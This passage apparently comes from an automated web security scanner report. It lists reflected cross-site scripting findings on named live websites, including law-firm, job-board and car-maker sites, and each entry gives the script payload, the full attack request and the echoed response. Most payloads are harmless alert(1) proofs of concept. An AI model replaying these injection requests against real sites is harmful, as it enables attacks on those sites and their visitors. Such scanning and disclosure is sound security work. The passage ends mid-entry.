Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000M6HzNwpPLpJtCoH-PvGbXWY:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:38 GMT;path=/
Content-Length: 71712


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
alse , hideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/9f2df';alert(1)//8ecbb1f6508'
};

var conf =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin'
};

var conf2 =
{
APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google,messenger'
...[SNIP]...

3.135. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [companyId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The value of the companyId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97fb2"><script>alert(1)</script>3bad20cc3eb was submitted in the companyId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=42197fb2"><script>alert(1)</script>3bad20cc3eb HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:24 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000G1_JrXVYveRAbSxDcQP-B9h:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=70
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:28 GMT;path=/
Content-Length: 58296


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?companyId=42197fb2"><script>alert(1)</script>3bad20cc3eb']);">
...[SNIP]...

3.136. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5616"><script>alert(1)</script>41dece5dd80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?d5616"><script>alert(1)</script>41dece5dd80=1 HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:17 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000sVZxJy0CmQsFdXIQLzrOsAU:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:20 GMT;path=/
Content-Length: 67435


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...
<a href="#"    onclick="toggleDisplayId('save');_gaq.push(['_trackEvent', 'vault.com tools', 'save', 'http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP?d5616"><script>alert(1)</script>41dece5dd80=1']);">
...[SNIP]...

3.137. http://www.velaw.com/offices/offices.aspx [ctl00%24txtboxSearch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.velaw.com
Path:   /offices/offices.aspx

Issue detail

The value of the ctl00%24txtboxSearch request parameter is copied into an HTML comment. The payload 405fd-->db11da91753 was submitted in the ctl00%24txtboxSearch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /offices/offices.aspx HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/offices/offices.aspx
Cache-Control: max-age=0
Origin: http://www.velaw.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45
Content-Length: 6790

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUIOTYxNDU2ODYPZBYCZg9kFgICAxBkZBYCAgEPZBYCAgEPZBYCAgMPZBYCAgcPZBYGAgEPDxYCHgRUZXh0BQdPZmZpY2VzZGQCAw8PFgIeBVRpdGxlBQEgZGQCBQ8PFgIfAAXyIjxUQUJMRSBib3
...[SNIP]...
%2BG1taFSSMCpm066tP5g%3D&__EVENTVALIDATION=%2FwEWDALagtuGBgKejOLuAgLs5fqeCgLz5fqeCgLy5fqeCgLx5fqeCgLw5fqeCgL35fqeCgL25fqeCgL15fqeCgKx3o%2BTDAKns8rnDiPy1LpQsocHPUGsrbmuTCDxeOCY&ctl00%24txtboxSearch=%27405fd-->db11da91753&ctl00%24ddl_Search=0&ctl00%24btnGo=Go&ctl00%24ContentPlaceHolder_Body%24ListSummaryOffice%24ctl00%24ContentPlaceHolder_Body%24ListSummaryOfficeEktronClientManager=EktronJS%2CEktronThickBoxJS%2CEktron
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:33:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Vinson &
...[SNIP]...
<input name="ctl00$ContentPlaceHolder_Body$txtboxSearch" type="text" value="'405fd-->db11da91753" id="ctl00_ContentPlaceHolder_Body_txtboxSearch" class="SiteSearch" style="width:130px;left: 199px" />
...[SNIP]...

3.138. http://www.velaw.com/search/search_result.aspx [searchtext parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.velaw.com
Path:   /search/search_result.aspx

Issue detail

The value of the searchtext request parameter is copied into an HTML comment. The payload 892c0-->b7aa13ac6c3 was submitted in the searchtext parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /search/search_result.aspx?searchtext='892c0-->b7aa13ac6c3&section=0 HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/offices/offices.aspx
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:34:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22470


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Vinson &
...[SNIP]...
<input name="ctl00$ContentPlaceHolder_Body$txtboxSearch" type="text" value="'892c0-->b7aa13ac6c3" id="ctl00_ContentPlaceHolder_Body_txtboxSearch" class="SiteSearch" style="width:130px;left: 199px" />
...[SNIP]...

3.139. http://www.velaw.com/workarea/csslib/ektronCss.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /workarea/csslib/ektronCss.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 41425<script>alert(1)</script>0ea1ee155f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/csslib/ektronCss.ashx?id=EktronThickBoxCss+EktronBubbleCss+EktronModalCss41425<script>alert(1)</script>0ea1ee155f HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Sat, 21 Jan 2012 18:32:25 GMT
Last-Modified: Fri, 21 Jan 2011 18:32:25 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 6917

#Ekt_AjaxContent{padding:0;margin:0;}#EkTB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#EkTB_window a:link{color:#666;}#EkTB_window a:visited{color:#666;}#EkTB_window a:hover{color:#00
...[SNIP]...
l('/WorkArea/images/application/bubble/bott.gif');}

/* ############################################################# */
/* ektron registered stylesheet: css file not found */
/* id: EktronModalCss41425<script>alert(1)</script>0ea1ee155f */
/* path:
/* ############################################################# */


3.140. http://www.velaw.com/workarea/java/ektronJs.ashx [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.velaw.com
Path:   /workarea/java/ektronJs.ashx

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 87cde<script>alert(1)</script>82c5bf98272 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /workarea/java/ektronJs.ashx?id=EktronWebToolBarJS87cde<script>alert(1)</script>82c5bf98272 HTTP/1.1
Host: www.velaw.com
Proxy-Connection: keep-alive
Referer: http://www.velaw.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.velaw.com&SiteLanguage=1033; EktGUID=bf5fdf70-b7e5-4354-a7e6-1e156b18231d; EkAnalytics=newuser; ASP.NET_SessionId=obqhqxaluhyuqcmur1ytfz45

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:31:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=31536000
Expires: Sat, 21 Jan 2012 18:31:09 GMT
Last-Modified: Fri, 21 Jan 2011 18:31:09 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 266

//################################################################
//ektron registered javascript: js file not found
//id: EktronWebToolBarJS87cde<script>alert(1)</script>82c5bf98272
//path:
//################################################################


3.141. http://www.veterinarycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 757dc"><script>alert(1)</script>3bca8978ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?757dc"><script>alert(1)</script>3bca8978ac9=1 HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=c8n3ncns7ht7t0si0k3dgtk073; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 96306

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.veterinarycrossing.com/?757dc"><script>alert(1)</script>3bca8978ac9=1">
...[SNIP]...

3.142. http://www.volunteercrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.volunteercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c91"><script>alert(1)</script>558fd7307bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f3c91"><script>alert(1)</script>558fd7307bc=1 HTTP/1.1
Host: www.volunteercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gsjp47s81aiji0u54k67gabll2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109157

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.volunteercrossing.com/?f3c91"><script>alert(1)</script>558fd7307bc=1">
...[SNIP]...

3.143. http://www.workathomecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.workathomecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ea6"><script>alert(1)</script>4ebf1ff23b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21ea6"><script>alert(1)</script>4ebf1ff23b7=1 HTTP/1.1
Host: www.workathomecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vppakdfp3q5re522ilii6gj224; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117823

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.workathomecrossing.com/?21ea6"><script>alert(1)</script>4ebf1ff23b7=1">
...[SNIP]...

3.144. http://www.writingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.writingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0d9"><script>alert(1)</script>4355e2650f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ad0d9"><script>alert(1)</script>4355e2650f=1 HTTP/1.1
Host: www.writingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=slji4fnof2adg25ahsbg5ats32; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113221

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.writingcrossing.com/?ad0d9"><script>alert(1)</script>4355e2650f=1">
...[SNIP]...

3.145. http://www.bcgsearch.com/searchresults.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bcgsearch.com
Path:   /searchresults.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e193"><script>alert(1)</script>73375c8c0c7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /searchresults.php?key=OP3V61427 HTTP/1.1
Host: www.bcgsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2e193"><script>alert(1)</script>73375c8c0c7

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=p8tpdlaudtgnv3nbu08cvm6rl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: BCGJOB_61427=61427; expires=Sat, 05-Feb-2011 19:35:18 GMT; domain=bcgsearch.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37779

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <title>Employment Attorney, Employment Lawyer Jobs, San Francisco, California - 61
...[SNIP]...
<input type="hidden" name="clscandidateinfo_refferalurl" value="http://www.google.com/search?hl=en&q=2e193"><script>alert(1)</script>73375c8c0c7">
...[SNIP]...

3.146. http://www.bmwusa.com/jsenvconst.ashx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /jsenvconst.ashx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a9f9"-alert(1)-"b61067d8f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

